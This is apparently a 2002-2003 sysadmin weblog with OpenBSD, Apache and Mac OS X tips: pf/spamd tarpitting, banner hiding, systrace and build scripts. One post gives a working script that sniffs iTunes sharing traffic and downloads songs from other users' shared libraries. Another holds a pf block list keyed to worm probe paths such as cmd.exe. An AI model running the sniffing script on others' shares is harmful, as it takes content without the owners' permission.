http://www.kluivers.com/joris/weblog/
http://alfredo.octavio.net/
http://daily.linnwood.org/yesterday/2003/05/13.html#000388
http://www.macnn.com/news/19461
http://www.thebenesch.com/iTunesComments.html
http://www.muxway.org/
http://www.ihateapple.com/forums/show.asp?id=125767&fid=12&tid=0
http://www.capndesign.com/archives/2003_05/001516.php
http://widepipe.org/
http://www.reinvigorate.net/archive/index.php?p=home (Registration Required)
http://www.rocktober.com/blog.html
http://greenehouse.blogspot.com/
http://iwalt.com/
http://seattletimes.nwsource.com/html/businesstechnology/134738808_appleglitch15.html
http://www.irdial.com/cgi-bin/suckpage.cgi
http://agent57.gbnet.net/~jrg/urls/urls.20030515.html
http://www.superdeluxo.com/
http://www.submitresponse.co.uk/mt/
http://www.the37.com/cgi-bin/iB3/ikonboard.cgi?act=ST;f=2;t=743;st=135;&#entry144
http://beconfident.cjb.net/ (In Korean)
http://dfwwireless.org/listarchive/msg00714.html
http://www.twinblog.com/ (In Dutch)
http://bored.cc/replies.php?action=view&record=16458
http://blog.largeheartedboy.com/
http://meettheg.com/
http://development.petrolink.net/W32/Blog.nsf/navblogs/2003-05-15!opendocument
http://disc.server.com/discussion.cgi?id=126568;article=46857
http://www.neverthink.com/weblog_archives/individual/2003/05/loony_itunes.shtml
http://www.macfreak.org/cgi/forums/topic.cgi?forum=1&topic=841

Download iLeech

iLeech v0.28 Binary (74k - May 15, 2003)
iLeech v0.28 Source (64k - May 15, 2003)
Perl script to dump an iTunes v4.0 shared playlist into a human readable file. (3k)

Contact Me: Well take note during my brief hiatus, I won't respond to any emails. So please don't get offended if you don't get a reply from me for a couple of days. But if you must send me an email, you can send it to subuni@users.sourceforge.net

Finally: Click here for the old page in all of it's hideous glory.
SourceForge Project Home: http://sourceforge.net/projects/ileech/

Posted by skp at 01:24 PM
maio 14, 2003
download remote itunes songs

very cool... friend of mine, jolt, had the idea of using ngrep and curl to save itunes songs while you're playing them. much easier than my idea of trying to download and figure out apple's little itunes database. script only figures out mp3 songs in this version... but i modified it to download m4a and m4p songs as well... but those need to be renamed manually. i also changed it to use wget instead or curl, since wget doesn't kick you out of itunes like curl does.

#!/bin/sh

while [ 1 ]; do

mp3_name=`date +%y%m%d%M%S.mp3`
#mp3_packet=`ngrep -n 1 -q "mp3" port 3689`
mp3_packet=`ngrep -n 1 -q "(mp3|aac|m4a|m4p)" port 3689`

mp3_url=`echo $mp3_packet | grep GET | awk '{print $7}'`
mp3_host=`echo $mp3_packet | grep GET | awk '{print $4}'`

echo "host is $mp3_host"
echo "url is: $mp3_url"

echo "Retrieving $mp3_name"
#curl -o $mp3_name "http://${mp3_host}${mp3_url}"
wget -O $mp3_name "http://${mp3_host}${mp3_url}"

echo "Renameing according to id3 tags."

id3_name=`perl id3_name.pl $mp3_name`; code=$?
echo "code is $code"
if [ $code = 0 ]; then
echo "Renaming $mp3_name to ${id3_name}"
mv "$mp3_name" "$id3_name"
echo "Done."
else
echo "No ID3 tags found"
echo -n "Please enter the name of the song: "
read song_name
mv "$mp3_name" "$song_name".mp3
echo "Done."
fi

done

Posted by skp at 10:33 AM
maio 06, 2003
share any folder via afp

We've had the ability to create share points when using personal file sharing for quite some time. Simply click a folder and select File -> Sharing, set your options, and go. With OS X, that functionality seems to have disappeared. According to Apple, we need OS X Server for this, but that is not so. Here's how you can create your very own share points in Mac OS X. Make sure you read all the coments... as the original story isn't complete.

Open NetInfo Manager and authenticate.
Create a new subdirectory in /config called SharePoints (unless it already exists)
Create a new subdirectory in /config/SharePoints/ with the name value as what you'd like the share to be called

SharePoint: add these properties
name -NetInfo name
directory_path -Path to directory
afp_use_parent_owner -Boolean: Use owner of parent?
afp_use_parent_privs -Boolean: Use privileges of parent?
afp_shared -Boolean: Share this item?
afp_name -Name visble to clients

name is only used in NetInfo, while afp_name will be used to identify the directory to the client. directory_path should start with a slash (/) so that it is not a relative path. Both afp_use_parent_owner and afp_use_parent_privs should be set to 0 (zero). Finally, make sure that afp_shared is set to 1 (one) so that it will share the directory.

-- skip -- here's my nidump infos
{
"name" = ( "SharePoints" );
CHILDREN = (
{
"afp_use_parent_owner" = ( "0" );
"afp_use_parent_privs" = ( "0" );
"directory_path" = ( "/Users/Shared" );
"name" = ( "mp3" );
"afp_name" = ( "mp3" );
"afp_shared" = ( "1" );
}
)
}


Posted by skp at 11:55 AM
fevereiro 28, 2003
annoying spammers with pf and spamd

Found on benzedrine.cx: "I don't like getting spam. Even though I can automatically delete spam without reading it, the spammers still successfully deliver their mails and get paid by volume. I want to hurt them. They should not be able to deliver their mails, and waste as much of their resources as possible attempting to do so.... "

very cool stuff... (already implemented here by the way)

also good reads: man spamd, man pfctl and man spamd-setup. note you gotsta be with openbsd-current to ride this ride.


here's the original text:
Annoying spammers with pf and spamd

Introduction
I don't like getting spam. The problem is not detecting it automatically, that works very well with tools like SpamAssassin and bmf . Even though I can automatically delete spam without reading it, the spammers still successfully deliver their mails and get paid by volume. I want to hurt them. They should not be able to deliver their mails, and waste as much of their resources as possible attempting to do so.

Tarpits
Tarpits like spamd are fake SMTP servers, which accept connections but don't deliver mail. Instead, they keep the connections open and reply very slowly. If the peer is patient enough to actually complete the SMTP dialogue (which will take ten minutes or more), the tarpit returns a 'temporary error' code (4xx), which indicates that the mail could not be delivered successfully and that the sender should keep the mail in his queue and retry again later. If he does, the same procedure repeats. Until, after several attempts, wasting both his queue space and socket handles for several days, he gives up. The resources I have to waste to do this are minimal.

If the sender is badly configured, an uncooperative recipient might actually delay his entire queue handling for several minutes each time he connects to the tarpit. And many spammers use badly configured open relays.

Obviously, I only want known spammers to get connected to my tarpit instead of my real MTA.

Blacklists
I can use an externally maintained list of spammers like spews.org to redirect senders to the tarpit selectively. But such lists may be either to slow to include new spamming hosts, or too aggressive for my taste. Some blacklists will not only include single hosts, but entire networks that contain a single spamming host, willingly hurting innocent customers of an ISP to pressure the ISP to terminate the spammer. The blacklist maintainers document such policies, and if I agree with them, it's my decision to block mail from such networks by using their blacklist.

But even if I'm comfortable with blocking mail from innocent bystanders and use the most aggressive blacklists combined, there will still be spammers getting mails delivered to me through newly discovered open relays. Those spam mails will of course be detected by my spam filters, so I'd like to use these IP addresses to build my own blacklist.

Building my own blacklist
Assume I have the following procmail configuration in place to detect (and file) spam:

:0fw
| /usr/local/bin/bmf -m maildir -p
:0:
* ^X-Spam-Status: Yes
in-x-spam

:0fw
| /usr/local/bin/spamc
:0:
* ^X-Spam-Status: Yes
in-x-spam

Each incoming mail is piped through the two spam detectors. If either one of them classifies the mail as spam, the message gets stored in a separate file. I could delete them instead, but I might want to check the mails for false positives every once in a while. Once the classifiers are tuned right, there will be almost no false positives, and almost all spam is detected. I'm reaching 99.95% accuracy here, with maybe 0.01% false positives, which is fine for me.

Analyzing Received: headers
I'm using one additional tool, relaydb , to build a database of all hosts that send me mail. This is done after the classification by the spam detectors, so I can tell the database whether the sender was sending spam or legitimate mail.

I add the following parts to my procmail configuration:

:0fw
| /usr/local/bin/bmf -m maildir -p
:0c
* ^X-Spam-Status: Yes
| /home/dhartmei/bin/relaydb -b
:0:
* ^X-Spam-Status: Yes
in-x-spam

:0fw
| /usr/local/bin/spamc
:0c
* ^X-Spam-Status: Yes
| /home/dhartmei/bin/relaydb -b
:0:
* ^X-Spam-Status: Yes
in-x-spam

:0c
| /home/dhartmei/bin/relaydb -w

So, detected spam gets piped through relaydb -b (blacklist), and legitimate mail through relaydb -w (whitelist). Note that only copies of mails get piped through relaydb, the program never modifies or drops a mail. All it does is build a database of hosts that sent me mail, counting spam and legitimate mail from each one.

relaydb traverses all Received: headers in a mail from top (nearest relay) to bottom. It only acts on valid numerical IP addresses in [] brackets, which is the only reliable part. And it's only reliable when I trust the previous relay in the chain, as spammers often add fake Received: headers. So relaydb starts with the top-most relay in the header and consults its database to see whether it is a known host, and if so, whether it sent me legitimate mail before. If that's the case, it increases the respective counter (spam or legitimate, as told through the -b/-w option) for that host and continues with the next relay found in the header. If the relay is a known spammer, traversal ends, as further headers cannot be trusted.

After I run this setup for a while, relaydb has built both a blacklist and a whitelist. One important detail is that a legitimate mail has more weight than than a spam mail. I regularly receive spam through mailing lists. Of course, I don't consider the mailing list server a spamming host. Yet, each spam I receive through it will increase the spam counter for that server. Therefore, relaydb only reports hosts as blacklisted when their spam counter is at least three times as high as the counter for legitimate mail (and the factor can be adjusted, of course). So a relay doesn't get blacklisted as long as it sends me legitimate mail to compensate for spam it sends, which covers mailing list servers. But if I get a spam from a host that never sent me anything before, that will cause it to get blacklisted immediately (1 >= 0*3).

Completing the puzzle
Now I'm building my own blacklist, based on the evidence I've seen myself, classified by my own spam detector configuration. The only politics involved in someone getting blacklisted are my own, I don't have to trust a third party to make fair decisions.

And I use this blacklist to redirect hosts to the tarpit, using pf and some cronjobs:

$ pfctl -sn
rdr inet proto tcp from to any port 25 -> 127.0.0.1 port 8025

$ relaydb -lb | pfctl -t spammers -T replace -f -

This requires a recent OpenBSD -current system.

Instead of just loading the relaydb blacklist to redirect to spamd, I could combine it with spews. Or I can use the whitelist to prevent hosts which have sent me legitimate mail before from getting redirected to spamd due to a spews listing, etc. There are many interesting combinations.

And how well does it work?
I'm getting several dozen connections redirected to the tarpit per hour, and most peers waste about ten minutes per connection, and retry several times, for multiple days. The impact on my own resources is minimal.

Best of all, I regularly get spam through a mailing list and the sender (not the mailing list server!) gets blacklisted. Then the same spammer connects to me directly, too, as it harvested my address like the one of the mailing list. And it gets stuck in the tarpit. For long. And many times.

Remember, I'm doing all of this not to reduce the amount of incoming spam. That gets detected and filed very reliably, anyway. The sole purpose is to hurt the spammers. And I'm thoroughly enjoying watching my spamd log now, as I'm perfectly sure that each of those connections comes from a spammer who has spammed me before.

"Spam me once, shame on you. Spam me twice, shame on me." :)

If you have questions or comments, write to daniel@benzedrine.cx . And all you spammers harvesting email addresses from pages like this, please spam me. My trap is awaiting you.

Related links
The OpenBSD project
The OpenBSD packet filter (pf)
spamd man page
SpamAssassin
bmf
procmail
spews.org Spam Prevention Early Warning System
Teergrubing FAQ by Lutz Donnerhacke
The Spam Problem: Moving Beyond RBLs by Philip Jacob

Posted by skp at 03:54 PM
dynamic ghetto ids

use openbsd's pf to dynamically block those damn 2 year old codered infected boxen. found on deadly.org: "Daniel is at it again. Answering the question of how to dynamically create rulesets based on arbitrary criteria, Daniel discusses how he tracks web clients and kills them with dynamic rulesets. This would be easy to extend to a variety of detection criteria and add various levels of security via a PF host. Don't forget that reactionary firewalls are a great way to lock yourself off the Internet, so don't be too overzealous in your ruleset building."

here's my code:

#!/bin/bash
## cool idea by Daniel Hartmeier ##
cat /etc/apache/quickblock.block |egrep -v "^(127\.|192\.168\.|10\.)" \
> /etc/apache/.quickblock.tmp
egrep -f /etc/apache/quickblock.grep /var/log/apache/access_log \
| cut -d " " -f 1 >> /etc/apache/.quickblock.tmp
sort -u < /etc/apache/.quickblock.tmp | egrep -v "^127\.0\.0\.1$" \
| egrep -v "^(192\.168\.|10\.)" > /etc/apache/quickblock.block
pfctl -t quickblock -T replace -f /etc/apache/quickblock.block
rm /etc/apache/.quickblock.tmp


here's the original message:
[prev in list ] [ next in list ] [ prev in thread ] [ next in thread ]List: openbsd-pf Subject: Re: [OpenBSD-pf] dynamic filtering based on httpd error_log From: Daniel Hartmeier Date: 2003-02-16 14:22:38 [Download message RAW ]On Sun, Feb 16, 2003 at 02:49:06AM -0500, Nathan Fisher wrote:

> I'm primarily interested in dynamic addition and removal of rule
> sets using pf.

With -current, this is pretty simple with tables.

For instance, I add IP addresses to a block rule when they request
certain pages from my web server. It's worth noting that a client must
complete the TCP handshake to fetch a page and get logged in the web
server log, so spoofing source addresses is no threat to this setup.

$ cat quickblock.grep
/crawlertrap/
/_vti_bin/
"GET /www/scripts/
cmd.exe
root.exe

$ cat quickblock (this is run from a cronjob)
cat ~/quickblock >~/quickblock.tmp
egrep -f ~/quickblock.grep /var/log/thttpd | cut -d " " -f 1 >>~/quickblock.tmp
sort -u <~/quickblock.tmp | grep -v "^127\.0\.0\.1$" >~/quickblock
pfctl -t quickblock -T replace -f ~/quickblock

$ pfctl -sr | grep quickblock
block drop in quick on kue0 inet from to any

So if a client requests /crawlertrap/index.html, because it's an
unpolite web crawler dishonouring my robots.txt, it gets added to the
quickblock table within a couple of minutes (when the cronjob runs the
next time), which blocks further connections from that source.

With pfctl -t quickblock -T , you can manually add or remove
addresses from that table, view statistics, etc., see the new pfctl man
page.

Evaluation of the ruleset doesn't get more expensive when the table size
grows, that's the nice thing about tables:

$ pfctl -t quickblock -T show | wc -l
414

It doesn't really matter if there are 400 or 40000 addresses in that
table, the rule will evaluate equally fast.

Daniel [prev in list ] [ next in list ] [ prev in thread ] [ next in thread ]

Configure Your Environment |About MARC | We're Hiring! | Want to add a list? Tell us about it . | 10East

Posted by skp at 10:53 AM
janeiro 29, 2003
spam2web

notice the new thing on the right side of fif3? shows the latest spams dropped into my box (hopefully i've got it filtered right so no pr0n shows up) get it here if you want. oh it requires a line in ~/.procmailrc too.

here's the procmail part. have new messages dropped into a directory

:0 HBci
* ! (naughty|words|that|you|dont|want|on|your|website)
/path/to/web/spam/folder

then set up the spam2web script to run once every couple minutes in cron. oh and you'll need to also need a way to post it to the webpage. i've used server-side includes. go google go.

here's the program from http://www.fif3.com/code/spam2url

#!/usr/local/bin/bash
## by skp v.2 Dec 30 2004 ##
##
## i use this to generate a list of spam i've received and
## randomly pick one to use as a title for my website
##
## first you need to shim off spam using procmail:
## :0 HBci
## /apache/virtualhost.fif3/htdocs/spam2web
##
## then in html, add a server side include
## and i use an include in the body for the list

RDIR=/apache/htdocs/spam2web
WDIR=/spam2web # path for website viewers
FILE1=$RDIR/results # file listing all the spam one subject per line
FILE2=$RDIR/results2 # file with just one spam subject

/sbin/chown www.daemon ${RDIR}/msg* ${RDIR}/*.txt 1>/dev/null 2>/dev/null
/bin/chmod a+rw ${RDIR}/msg* ${RDIR}/*.txt 1>/dev/null 2>/dev/null

while (( `ls -tr ${RDIR}/msg*txt |wc -w` > 7 )) ;do
rm `ls -trm ${RDIR}/msg*txt |tr -d "\r"|tr -d "\n" |cut -d',' -f -1`
done

for i in `ls -t ${RDIR}/msg* |grep -vi .txt`
#do if [[ ! -a $i.txt ]] ;then
do cat $i |/usr/local/bin/formail -k -X From: -X Subject: > ${i}.txt
rm $i
#fi
done

rm $FILE1
for i in `ls -t ${RDIR}/msg*txt`
do SUB=`cat ${i} |grep -e '^Subject:' |tr -cd "[:print:]" |grep -A50 -C1 Subject |cut -d' ' -f2- |cut -c -40`
WFILE=`echo ${i}|cut -d'/' -f6`
if [[ $SUB ]] ;then
echo "${SUB}
" >> $FILE1
fi
done

## pull a random line out just for our headline
RANDOM=$$ ; let number=0 ; let RANGE=5
while [ $number -eq 0 ]
do number=$RANDOM ; let "number %= $RANGE" ;done
cat $FILE1 |tail -"$number" |head -n1 > $FILE2

rm -f `ls ${RDIR}/msg* |grep -ve 'txt$'` 1>/dev/null 2>/dev/null

Posted by skp at 10:38 AM
dezembro 12, 2002
forking perl

forking perl network server that does nothing more than echo back a text string that you feed it. check it at www.fif3.com/code

#!/usr/bin/perl
### by skp ###

use strict;
use IO::Socket;
use IO::Select;
use Getopt::Std;
use POSIX qw(:sys_wait_h);

my (%args);
getopts("p:t:", \%args);
if (!$args{p} || !$args{t}) {
print "\nusage: $0 -p port -t text\n";
print " note: i will append \\r\\n to your text\n";
print " 200OK.pl by skp\n\n";
exit;
}

sub REAP {
1 until (-1 == waitpid(-1, WNOHANG));
$SIG{CHLD} = \&REAP;
}

$SIG{CHLD} = \&REAP;
my $port = $args{p};
my $text = $args{t};
my $sock = new IO::Socket::INET(
LocalPort => $port,
Proto => 'tcp',
Listen => SOMAXCONN,
Reuse => 1);
$sock or die "no socket :$!";
STDOUT->autoflush(1);

my($new_sock, $buf, $stinky);
while ($new_sock = $sock->accept()) {
# run fork. if parent then done.
# go to continue.
next if $stinky = fork;
die "fork: $!" unless defined $stinky;
# child process.
# done with server.
close $sock;

while (defined($buf = <$new_sock>)) {
chop $buf;
print($new_sock "$text\r\n");
}
exit;
} continue {

# close client.
close $new_sock;
}

Posted by skp at 02:36 PM
novembro 13, 2002
ssh tunnel

ssh user@host -L localport:destip:destport

Posted by skp at 03:32 PM
novembro 11, 2002
killall

#!/bin/bash
## script by skip

if [[ $1 ]] ;then
if [[ -f /var/run/$1 ]] ;then
for i in `cat /var/run/$1` ;do kill $i 1>/dev/null 2>/dev/null
done ; fi
for i in `ps ax |grep $1 |awk '{print $1}'` ;do kill $i 1>/dev/null 2>/dev/null
done
else echo "usage: killall " ;fi

Posted by skp at 01:41 PM
for i in *

for i in * ;do echo $i ;cat $i |grep -B5 -i cisco ;done

don't try this at home

Posted by skp at 01:39 PM
setembro 25, 2002
use anoncvs regularly

using anoncvs regularly to update openbsd source tree

First, start out by `get'-ing an initial tree:
(If you are following current):
# setenv CVSROOT anoncvs@anoncvs.ca.openbsd.org:/cvs
# cd /usr
# cvs -q get -P src

# setenv CVSROOT anoncvs@anoncvs.ca.openbsd.org:/cvs
# cd /usr
# cvs -q get -P ports

Anytime afterwards, to `update' this tree:

#!/bin/bash
## export CVSROOT=anoncvs@anoncvs.ca.openbsd.org:/cvs

echo "" ;echo "--- begin cvs updates for `date` ---"
export CVSROOT=':pserver:anoncvs@anoncvs.ca.openbsd.org:/cvs'

cd /usr/src
cvs -d $CVSROOT -q up -Pd

cd /usr
cvs -d $CVSROOT -q up -Pd ports
echo "--- end cvs updates for `date` ---" ;echo ""

Posted by skp at 10:00 AM
setembro 18, 2002
htaccess quick

don't trust other people's code unless you have to... and then don't trust it farther than you can throw it. users demand suid root perl scripts for apache? probably should protect that stuff with htaccess. it's not going to fix anything, but it will keep loosers and worms from rooting you box. check these out: apacheweek, bignosebird, and apache-server. or just use google

btw i've removed the .htaccess from /cgi-bin/howto/ so you all can comment again

step 1: make .htaccess in whatever directory you want to protect

AuthUserFile /usr/www/dirname/.htpasswd
AuthGroupFile /dev/null
AuthName "The Secret Page"
AuthType Basic


require valid-user

step 2: set a password
htpasswd -c .htpasswd user_name

Posted by skp at 09:10 AM
setembro 06, 2002
fink update all

fink on mac os x is great... if you like having to leave your workstation alone compiling code for hours. no really it's nice. i would like it to do some intelligent stuff like checking for precompiled packages and using them instead of compiling it's own. baby G4 Ti book is only running at 333mhz so i feel the pain.

i don't like running "fink update-all" as if one package dies the whole thing dies. instead, run a little script to get the latest updates, and update them one at a time.

fink -y -q selfupdate ;for i in `fink -y list |egrep -i '\(i\)' |awk '{print $2}'` ;do fink -y -q update $i ;done

Posted by skp at 09:22 AM
setembro 03, 2002
systrace in openbsd-current

since there's almost no documentation for it outside of "man systrace" here's some examples of what i've kludged together to get systrace happy on my openbsd box. remember you've got to be up and running with openbsd-current. we do love niels provos. i know i'm running devel code and it does hurt to be ahead of the curve, but there's really no documentation for this thing and it's pissing me off.

update: really this is annoying... i can't get systrace to do anything meaningful outside of breaking my processes. it mostly tells me "no ld.so" even after i've allowed it. if anyone has better documentation on using systrace please let me know.

of course you need to be running -current, with a new kernel and everything. make sure this is somewhere in your kernel config (/usr/src/sys/arch/i386/conf/GENERIC)
pseudo-device systrace

after building your new kernel and rebooting
(config GENERIC && cd ../compile/GENERIC && make clean && make depend && make && cp /bsd /bsd.old && cp bsd /bsd && chown root.wheel /bsd && reboot)

you'll need to copy MAKEDEV from /home/newroot/dev/ to /dev and then run /dev/MAKEDEV systrace

now you can run systrace against a daemon or whatever you want. i'm running it in learning mode right now like this:
systrace -A -i -d /etc/systrace -p 27715 /usr/sbin/httpd
oh and here's a quick script to find the pid of processes that don't stick nice little files in /var/run:
PID_HTTP=`ps aux|grep httpd |grep root |egrep -vi '(man|grep|systrace)' |awk '{ print $2 }'`

after you're sure systrace has seen everything "normal" the daemon should be able to do, change the "-A" to "-a" and it'll begin to enforce policy.

Posted by skp at 11:08 PM
hatem web ads

tons of ways to stop unwanted advertisements. trick your box into thinking that the offending website is somewhere it isn't. use the hosts file, remap crap to localhost, done. uhmmm almost. actually you'll need this website to do it on mac os x since darwin likes it's netinfo database. (cached here for your pleasure)

now tons of requests get sent to your localmachine... even causing unending errors in netscape. time to start apache and set the errordocument to a blank site. now done. mac os x is great for this since it's got mad bsd skills, though the whole netinfo thing really screws with me.

after adding all naughty crap ad sites to your hosts file or database, you need to change this line in httpd.conf and start apache:
ErrorDocument 404 /errordoc.html

then add this file in your webroot /htdocs/errordoc.html

Posted by skp at 06:58 AM
bash profile me

to type the same thing over and over again in a very repetative way that seems to copy that which was just written, it seems, is a very nimious way to do things which are repetative.

way better than making files in /usr/local/bin... don't you always think to yourself "self, who's connected to my box right now" or maybe "why the hell does openbsd require one to type ifconfig -a when linux knows what to do without the -a

alias sshsomeplace='ssh jim@hotmail.org'
alias i='ifconfig -a'
alias l='clear;exit'
alias es='netstat -na |grep -i esta |grep -v 127.0.0.1 |sort -n -t. -k2'
alias li='netstat -na |grep -i list |grep -v 127.0.0.1 |sort -n -t. -k2'
alias cls='clear;ls'

Posted by skp at 04:11 AM
stinky old bsd

if you're not running -current then, well, you've probably been rooted by now. me? i'm no target for balls-nasty uber hackers like gobbles and crew who have more time on their hands than i to research crap and make 0day sploits. hell even if someone with skillz wants to root my box what are they gonna get? my ~ has nothing more than a 40meg mail spool from the damn incidents list and maybe a personal message every few weeks for cheap viagra.

here's my script to update my system to openbsd-current. mostly borrowed from openbsd website and also here.

#!/bin/bash
#### fun ##
# Rebuild and install gcc
# Recompile a kernel
# Reboot and run make build
###########################

## update sources
export CVSROOT=':pserver:anoncvs@anoncvs.ca.openbsd.org:/cvs'
cd /usr/src && cvs -d $CVSROOT -q up -Pd
cd /usr && cvs -d $CVSROOT -q up -Pd ports

## clean tree
find . -type l -name obj | xargs rm && \
make -k cleandir && \
rm -rf /usr/obj/* && \
make obj

## any new devices
cd /dev && \
cp /usr/src/etc/etc.`machine`/MAKEDEV ./ && \
./MAKEDEV all

## fix any file hierarchy changes
cd /usr/src/etc/mtree && \
install -c -o root -g wheel -m 600 special /etc/mtree && \
install -c -o root -g wheel -m 444 4.4BSD.dist /etc/mtree && \
mtree -qdef /etc/mtree/4.4BSD.dist -p / -u

## fix up ld.so dynamic loader
cd /usr/src && \
make obj && \
cd /usr/src/gnu/usr.bin/ld/rtld && \
make depend && make && make install

## rebuild and install new libc
cd /usr/src/include && \
make prereq && make includes && \
cd /usr/src/lib/libc && \
make depend && make NOMAN=1 && make NOMAN=1 install

## cleanup gcc
rm -r /usr/obj/gnu/egcs/gcc/*
cd /usr/src/gnu/egcs/gcc && \
make -f Makefile.bsd-wrapper clean && \
make -f Makefile.bsd-wrapper obj && \
make -f Makefile.bsd-wrapper depend && \
make -f Makefile.bsd-wrapper && \
make -f Makefile.bsd-wrapper install && \
make -f Makefile.bsd-wrapper clean && \
make -f Makefile.bsd-wrapper depend && \
make -f Makefile.bsd-wrapper && \
make -f Makefile.bsd-wrapper install && \

## rebuild ld
cd /usr/src/gnu/usr.bin/binutils && \
make -f Makefile.bsd-wrapper cleandir && \
make -f Makefile.bsd-wrapper obj && \
make -f Makefile.bsd-wrapper depend && \
make -f Makefile.bsd-wrapper && \
make -f Makefile.bsd-wrapper install

## clean out old object files
rm -rf /usr/obj/* && \
cd /usr/src && \
make obj && \
## make directories
cd /usr/src/etc && make DESTDIR=/ distrib-dirs && \
## make new kernel
cd /usr/src/sys/arch/`machine`/conf && \
config GENERIC && \
cd ../compile/GENERIC && \
make clean && make depend && make && \
cp /bsd /.bsd.`date "+%H%M%S%Y"`.old && \
cp /bsd /bsd.old && cp bsd /bsd && \
chown root.wheel /bsd && \
## reboot here
## compile new system
cd /usr/src && \
make build && \

## play with the new etc
mkdir /home/newroot
export DESTDIR=/home/newroot
cd /usr/src/etc && make distribution-etc-root-var
export DESTDIR="/"


#####################################
oh, and here's how to update a single spot in your openbsd source tree:
# cd /usr/src/usr.bin/ssh
# make obj
# make cleandir
# make depend
# make
# make install

or just in case you need to patch something:
# cd /usr/src/usr.bin/ssh
# patch -p0 < .../openbsd31_3.4.patch
# make obj
# make cleandir
# make depend
# make
# make install

Posted by skp at 03:41 AM
SSH WinXP 5.0.3215.6294

heh while we're on the topic of banners... here's something dmuz came acrost while romping in the sshd source. simple one file edit and your openssh banner can be super custom. change it to read AmigaOS for all i care.

edit /usr/src/usr.bin/ssh/version.h in the openbsd source tree. change

#define SSH_VERSION "SSH OpenBSD 2.9"
to whatever you want... i like this the most:
#define SSH_VERSION "SSH WinXP 5.0.3235.3194"

now when you nc www.server.com 22 you get the super l33t ssh banner:
SSH-2.0-SSH WinXP 5.0.3235.3194

Posted by skp at 02:52 AM
damn apache banners

i know it's not _super effective_ and won't do much to stop a skilled attacker, but removing service banners can slow skript kiddies, worms, lUser tools, etc.

here's my all-time favorite httpd.conf options that effectively remove everything in the "Server" string past "Server: Apache" i figure that's good enough for now.

ServerType standalone
ServerTokens Prod
ServerSignature Off
LimitRequestLine 1279
LimitRequestFieldsize 1279
LimitRequestFields 127
ExtendedStatus Off
UseCanonicalName Off
HostnameLookups Off
ErrorDocument 404 /errordoc.html

note the LimitRequests can break stuff if you're running funky stuff. if not, go for it. oh and the ErrorDocument is like a five line empty web page.

Posted by skp at 02:37 AM
agosto 29, 2002
why install slashcode

problem: slashcode powered websites are rare indeed. wanna know why? damn not easy to install fresh mysql, perl, apache, mod_perl, etc and then realize that apache is chrooted... plan on either undooing that with a 'httpd -u' on startup or a few months of installing into apache's chroot for fun

i ended up going with movable type... it's easy to install and looks clean. all that it requires is perl, a database, and apache. check here for mysql database help

the best help i found was this site: howto install slashcode for dummies
(cached for your pleasure)

everything worked fine up to the mod_perl installation for apache. it dies on 'make test' with:

<=== src
cp t/conf/mod_perl_srm.conf t/conf/srm.conf
/root/downloads/apache_1.3.26/src/httpd -f `pwd`/t/conf/httpd.conf -X -d `pwd`/t &
httpd listening on port 8529
will write error_log to: t/logs/error_log
letting apache warm up...done
/usr/bin/perl t/TEST 0
still waiting for server to warm up...............not ok
server failed to start! (please examine t/logs/error_log) at t/TEST line 95.
*** Error code 9
Stop in /root/downloads/mod_perl-1.27 (line 1327 of Makefile).

with t/logs/error_log saying that the ports is already in use. in use? you just started it and you already regret it? grrr.

Posted by skp at 05:43 PM
http read, https edit

no one likes ssl, let alone https. so the trick is to use http as much as possible. reading websites requires no encryption, but things should jump to ssl whenever passwords are involved.

how to disallow a directory for http, only allowing access via https?

here's excerps from httpd.conf, restricting /cgi-bin/howto to only work via https.


DocumentRoot /var/www/htdocs/
ServerName www.fif3.com
ServerAlias fif3.com, *.fif3.com
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"

AllowOverride All
Options ExecCGI
order allow, deny
deny from all

order allow, deny
deny from all



DocumentRoot /var/www/htdocs/
SSLEngine on

AllowOverride All
Options ExecCGI
Order deny,allow
allow from all

order allow, deny
deny from all



Posted by skp at 07:54 AM